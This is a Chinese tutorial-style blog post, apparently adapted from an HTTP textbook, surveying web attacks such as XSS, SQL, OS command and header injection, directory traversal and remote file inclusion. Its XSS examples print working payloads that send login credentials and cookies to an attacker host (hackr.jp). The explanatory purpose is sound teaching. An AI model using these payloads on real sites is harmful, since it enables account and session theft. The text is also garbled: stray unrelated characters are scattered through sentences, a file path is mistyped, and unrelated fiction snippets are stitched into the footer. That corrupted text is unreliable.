針對 Web 的攻擊技術(一)

簡單的HTTP協(xié)議本身并不存在安全性問題绘迁,因此協(xié)議本身幾乎不會成為攻擊的對象合溺。應用HTTP協(xié)議的服務器和客戶端,以及運行在服務器上的Web應用等資源才是攻擊目標缀台。

Web 是建立在 HTTP 協(xié)議上通信的

來自互聯(lián)網的攻擊大多是沖著Web站點來的辫愉,它們大多把Web應用作為攻擊目標。


一将硝、針對Web應用的攻擊技術

攻擊事件傾向

在客戶端即可篡改請求:
在 Web 應用中,從瀏覽器接收到的HTTP請求的全部內容屏镊,都可以在客戶端自由的更改依疼、篡改。所以 Web 應用可能會接收到與預期數(shù)據不相同的內容而芥。
在HTTP請求報文內加載攻擊代碼律罢,就能發(fā)起對Web應用的攻擊。

對 Web 應用的攻擊

針對 Web 應用的攻擊模式:?主動攻擊、被動攻擊

主動攻擊?是指:攻擊者通過直接訪問Web應用误辑,把攻擊代碼傳入的攻擊模式沧踏。
由于該模式是直接針對服務器上的資源進行攻擊,因此攻擊者需要能夠訪問到那些資源巾钉。
例:SQL注入和OS命令注入攻擊翘狱。

主動攻擊

被動攻擊??是指:利用全套策略執(zhí)行攻擊代碼的攻擊模式。
攻擊者不直接對目標Web應用訪問發(fā)起攻擊砰苍。
例:利用用戶的身份攻擊原本從互聯(lián)網上無法直接訪問的企業(yè)內部網絡

被動攻擊
利用被動攻擊對企業(yè)內網發(fā)動攻擊


二潦匈、因輸出值轉義不完全引發(fā)的安全漏洞

實施 Web 應用的安全對策,大致分為兩部分:
? ● 客戶端的驗證
? ● Web 應用端的驗證(服務器端)
? ? ? ? ○ 輸入值驗證
? ? ? ? ○ 輸出值驗證

驗證數(shù)據的幾個地方

多數(shù)情況下赚导,采用 JS 在客戶端驗證數(shù)據茬缩。可是在客戶端允許篡改數(shù)據或關閉 javascript吼旧,不適合將JS驗證作為安全的防范對策凰锡。保留客戶端驗證只是為了盡早地識別輸入錯誤,起到提高 UI 體驗的作用圈暗。

Web 應用端的驗證:
輸入值驗證:按 Web 應用內的處理可能被誤認為是具有攻擊性意義的代碼掂为。
? ? ? ? ? ? ? ? ? ? ? 通常是檢驗是否符合系統(tǒng)業(yè)務邏輯的數(shù)值或檢查字符編碼等預防策略。
輸出值驗證:從數(shù)據庫厂置、文件系統(tǒng)菩掏、HTML 或郵件等輸出 Web 應用處理的數(shù)據的時候,針對輸出做值轉義處理是一項至關重要的安全策略昵济。輸出值轉義不完全時智绸,會因觸發(fā)攻擊者傳入的攻擊代碼,而給輸出對象帶來損害访忿。


(一)跨站腳本攻擊 (Cross-Site Scripting瞧栗,XSS)

跨站腳本攻擊是指:通過存在安全漏洞的 Web 網站注冊用戶的瀏覽器內運行非法的 HTML 標簽或 JS 進行的一種攻擊。
動態(tài)創(chuàng)建的 HTML 部分有可能隱藏著安全漏洞海铆。攻擊者編寫腳本設下陷阱迹恐,用戶在自己的瀏覽器上運行時,一不小心就會受到被動攻擊卧斟。

可能造成的影響:
? ? 1. 利用虛假輸入表單騙取用戶個人信息殴边。
? ? 2. 利用腳本竊取用戶的 Cookie 值,被害者在不知情的情況下珍语,幫助攻擊者發(fā)送惡意請求锤岸。
? ? 3. 顯示偽造的文章或圖片。

XSS案例:

案例1:??在動態(tài)生成HTML處可能隱含安全漏洞
以編輯個人信息頁面為例:

編輯界面輸入的字符串原樣顯示在確認界面
按照輸入內容原樣顯示的機制

輸入帶有HTML標簽的字符串板乙,瀏覽器會把用戶輸入的 < s > 解析成HTML標簽是偷。
刪除線顯示出來并不會造成太大的不利后果,但如果換成使用 script 標簽呢?

案例2:?

XSS攻擊是攻擊者利用預先設置的陷阱觸發(fā)的被動攻擊

下圖網站通過地址欄中 URI 的查詢字段指定 ID蛋铆,即相當于在表單內自動填寫字符串的功能馋评。就在這個地方,隱藏著可執(zhí)行跨站腳本攻擊的漏洞刺啦。

通過地址欄中 URI 的查詢字段指定 ID

充分熟知此處漏洞特點的攻擊者留特,于是創(chuàng)建了下面這段潛入惡意代碼的 URL。并隱藏植入事先準備好的欺詐郵件中或 Web 頁面內洪燥,誘使用戶去點擊改 URL磕秤。

http://example.jp/login?ID="><script>var+f=document
.getElementById("login");+f.action="http://hackr.jp/pwget";+f.
method="get";</script><span+s="

瀏覽器打開該 URI 后,直觀感覺沒有發(fā)生任何變化捧韵,但設置好的腳本卻偷偷開始運行了市咆。

之后,ID 及密碼會傳給該正規(guī)網站再来,接下來仍然是按正常登錄步驟蒙兰,用戶很難意識到自己的登錄信息已遭泄漏。

對 http://example.jp/login?ID=yama 請求時對應的HTML源代碼(摘錄)

<form action="http://example.jp/login" method="post" id="login">
? ? <div class="input_id">
? ? ? ? ID: <input type="text" name="ID" value="yama">
? ? </div>
...

http://example.jp/login?ID="><script>var+f=document.getElementById("login");+f.action
="http://hackr.jp/pwget";+f.method="get";</script><span+s="? 請求時對應的HTML源代碼(摘錄)

<form action="http://example.jp/login" method="post" id="login">
? ? <div class="input_id">
? ? ? ? ID: <input type="text" name="ID" value=""><script>var f=document.getElementById("login"); f.action="http://hackr.jp/pwget"; f.method="get";</script><span s="" />
? ? </div>
...


案例3. 對用戶 Cookie 的竊取攻擊

除了表單芒篷,惡意構造的腳本同樣能夠以XSS的方式竊取到用戶的 cookie 信息搜变。

<script src=http://hackr.jp/xss.js></script>

http://hackr.jp/xss.js 文件的內容:

var content = escape(document.cookie);
document.write("<img src=http://hackr.jp/?");
document.write(content);
document.write(">");

在存在可跨站腳本攻擊安全漏洞的Web應用上執(zhí)行上面這段 JS 程序,即可訪問到該 Web 應用所處域名下的 Cookie 信息针炉。

使用 XSS 攻擊奪取 Cookie 信息

(二)SQL 注入攻擊

SQL注入是指:針對 Web 應用使用的數(shù)據庫挠他,通過運行非法 SQL 而產生的攻擊篡帕。有時會直接導致個人信息及機密信息的泄漏。


(三)OS 命令注入攻擊

OS命令注入攻擊是指:通過 Web 應用拢军,執(zhí)行非法的操作系統(tǒng)命令達到攻擊的目的茉唉。只要在能調用 Shell 函數(shù)的地方就有存在被攻擊的風險结执。
可以從Web應用中通過Shell來調用操作系統(tǒng)命令。倘若調用Shell時存在疏漏坚芜,就可以執(zhí)行插入的非法OS命令。


(四)HTTP 首部注入攻擊

HTTP首部注入攻擊是指:攻擊者通過在響應首部字段內插入換行铸敏,添加任意響應首部或主題的一種攻擊。


(五)郵件首部注入攻擊

郵件首部注入是指: Web 應用中的郵件發(fā)送功能闪水,攻擊者通過向郵件首部 To 或 Subject 內任意添加非法內容發(fā)起的攻擊蒙具。
利用存在安全漏洞的網站禁筏,可對任意郵件地址發(fā)送廣告郵件或病毒郵件。


(六)目錄遍歷攻擊

目錄遍歷攻擊是指:對本來無意公開的文件目錄篱昔,通過非法截斷其目錄路徑后,達成訪問目的的一種攻擊空执。
通過 Web 應用對文件處理操作時穗椅,在由外部指定文件名的處理存在疏漏的情況下,用戶可使用 .../ 等相對路徑定位到 /etc/passed 等絕對路徑上门坷,因此服務器上任意的文件或文件目錄皆有可能被訪問到桑孩。這樣一來,就有可能非法瀏覽敏簿、篡改或刪除 Web 服務器上的文件惯裕。

應關閉指定對任意文件名的訪問權限绣硝。


(七)遠程文件包含漏洞

遠程文件包含漏洞是指:當部分腳本內容需要從其他文件讀入時鹉胖,攻擊者利用指定外部服務器的 URL 充當依賴文件,讓腳本讀取之后挠铲,就可運行任意腳本的一種攻擊拂苹。

應控制對任意文件名的指定瓢棒。

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市念颈,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌嗅绰,老刑警劉巖,帶你破解...
    沈念sama閱讀 222,681評論 6 517
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件窘面,死亡現(xiàn)場離奇詭異翠语,居然都是意外死亡财边,警方通過查閱死者的電腦和手機肌括,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 95,205評論 3 399
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來谍夭,“玉大人,你說我怎么就攤上這事憨募〗羲鳎” “怎么了?”我有些...
    開封第一講書人閱讀 169,421評論 0 362
  • 文/不壞的土叔 我叫張陵菜谣,是天一觀的道長珠漂。 經常有香客問我尾膊,道長媳危,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 60,114評論 1 300
  • 正文 為了忘掉前任,我火速辦了婚禮暮蹂,結果婚禮上第租,老公的妹妹穿的比我還像新娘。我一直安慰自己,他們只是感情好,可當我...
    茶點故事閱讀 69,116評論 6 398
  • 文/花漫 我一把揭開白布券犁。 她就那樣靜靜地躺著术健,像睡著了一般。 火紅的嫁衣襯著肌膚如雪粘衬。 梳的紋絲不亂的頭發(fā)上荞估,一...
    開封第一講書人閱讀 52,713評論 1 312
  • 那天,我揣著相機與錄音稚新,去河邊找鬼勘伺。 笑死,一個胖子當著我的面吹牛褂删,可吹牛的內容都是我干的飞醉。 我是一名探鬼主播,決...
    沈念sama閱讀 41,170評論 3 422
  • 文/蒼蘭香墨 我猛地睜開眼屯阀,長吁一口氣:“原來是場噩夢啊……” “哼缅帘!你這毒婦竟也來了?” 一聲冷哼從身側響起难衰,我...
    開封第一講書人閱讀 40,116評論 0 277
  • 序言:老撾萬榮一對情侶失蹤钦无,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后盖袭,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體失暂,經...
    沈念sama閱讀 46,651評論 1 320
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 38,714評論 3 342
  • 正文 我和宋清朗相戀三年苍凛,在試婚紗的時候發(fā)現(xiàn)自己被綠了趣席。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 40,865評論 1 353
  • 序言:一個原本活蹦亂跳的男人離奇死亡醇蝴,死狀恐怖宣肚,靈堂內的尸體忽然破棺而出,到底是詐尸還是另有隱情悠栓,我是刑警寧澤霉涨,帶...
    沈念sama閱讀 36,527評論 5 351
  • 正文 年R本政府宣布按价,位于F島的核電站,受9級特大地震影響笙瑟,放射性物質發(fā)生泄漏楼镐。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 42,211評論 3 336
  • 文/蒙蒙 一往枷、第九天 我趴在偏房一處隱蔽的房頂上張望框产。 院中可真熱鬧,春花似錦错洁、人聲如沸秉宿。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,699評論 0 25
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽描睦。三九已至,卻和暖如春导而,著一層夾襖步出監(jiān)牢的瞬間忱叭,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,814評論 1 274
  • 我被黑心中介騙來泰國打工今艺, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留韵丑,地道東北人。 一個月前我還...
    沈念sama閱讀 49,299評論 3 379
  • 正文 我出身青樓洼滚,卻偏偏與公主長得像埂息,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子遥巴,可洞房花燭夜當晚...
    茶點故事閱讀 45,870評論 2 361

推薦閱讀更多精彩內容

  • 本文主要講解具體有哪些攻擊 Web 站點的手段千康,以及攻擊會造成怎樣的影響。 針對 Web 應用的攻擊模式 對 We...
    杰哥長得帥閱讀 1,696評論 0 5
  • 1. 網絡基礎TCP/IP HTTP基于TCP/IP協(xié)議族铲掐,HTTP屬于它內部的一個子集拾弃。 把互聯(lián)網相關聯(lián)的協(xié)議集...
    yozosann閱讀 3,445評論 0 20
  • Spring Cloud為開發(fā)人員提供了快速構建分布式系統(tǒng)中一些常見模式的工具(例如配置管理,服務發(fā)現(xiàn)摆霉,斷路器豪椿,智...
    卡卡羅2017閱讀 134,716評論 18 139
  • 跨站腳本(XSS)是web應用中的一種典型的計算機安全漏洞。XSS允許攻擊者可以在其他用戶瀏覽的web頁面中注入客...
    留七七閱讀 7,965評論 1 26
  • 1.《音樂專輯油畫之...》 色相黃紅綠橙携栋,純度中明度高搭盾,暖調。 音樂專輯油畫婉支,以陳舊的樂譜為背景鸯隅,突顯年代感,背...
    葡萄紫耶閱讀 866評論 0 1